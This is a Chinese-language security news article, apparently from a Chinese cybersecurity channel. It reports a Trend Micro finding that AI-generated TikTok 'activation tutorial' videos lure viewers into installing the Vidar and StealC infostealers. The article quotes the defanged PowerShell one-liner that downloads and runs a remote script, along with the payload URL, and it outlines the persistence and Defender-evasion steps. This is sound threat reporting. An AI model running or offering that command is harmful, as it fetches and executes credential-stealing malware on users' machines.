关键词
网络犯罪分子正将 TikTok 打造成恶意软件传播的新战场。近期,一项利用 TikTok 热门视频进行社交工程攻击的行动被曝光,攻击者通过 AI 生成的视频伪装成“软件激活教程”,诱导用户下载 Vidar 和 StealC 等信息窃取型木马。
这些视频通常宣称可以免费激活 Windows、Office、CapCut、Spotify 等流行应用,吸引大量用户点击。在一个案例中,单条恶意视频就获得了近 50 万次观看、超过 2 万点赞和上百条评论,显示该攻击形式的高传播性与欺骗性。
Trend Micro 披露,该行动涉及多个 TikTok 账号,包括 @gitallowed、@zane.houghton、@allaivo2、@sysglow.wow 等,所发布视频内容相似,均采用 AI 合成语音,无真人出镜,显示攻击者可能使用了自动化视频生成工具以实现大规模扩散。
攻击流程详解:PowerShell 下载执行远程木马
受害者在视频引导下,手动运行如下 PowerShell 命令:
iex (irm hxxps://allaivo[.]me/spotify)该命令触发多阶段感染链,具体过程如下:
创建隐藏目录:脚本首先在受害系统的
APPDATA和LOCALAPPDATA目录下建立隐藏文件夹;规避杀软:将这些目录添加至 Windows Defender 的排除列表,从而规避检测;
下载木马主程序:从远程地址
hxxps://amssh[.]co/file.exe下载 Vidar 或 StealC 样本;持久化机制:通过注册表项实现开机自启,并下载额外脚本
script.ps1以维持远程控制。
木马特点:利用合法平台隐藏通信行为
Vidar 木马具有复杂的 C2(命令与控制)隐匿机制。它滥用 Steam 用户资料页与 Telegram 频道作为“死信投递站”(Dead Drop Resolver),借此动态获取真实 C2 地址,极大增强了对抗域名封锁和安全追踪的能力。
此次攻击通过 TikTok 平台展开,是传统恶意软件传播方式向社交平台渗透的典型案例。不同于以往通过恶意网站、邮件钓鱼进行诱导的手法,该行动将所有社工链条集成进视频内容中,显著提高了欺骗成功率,也对现有安全检测机制构成挑战。
安全圈
网罗圈内热点 专注网络安全
实时资讯一手掌握!
好看你就分享 有用就点个赞
支持「安全圈」就点个三连吧!
热门跟贴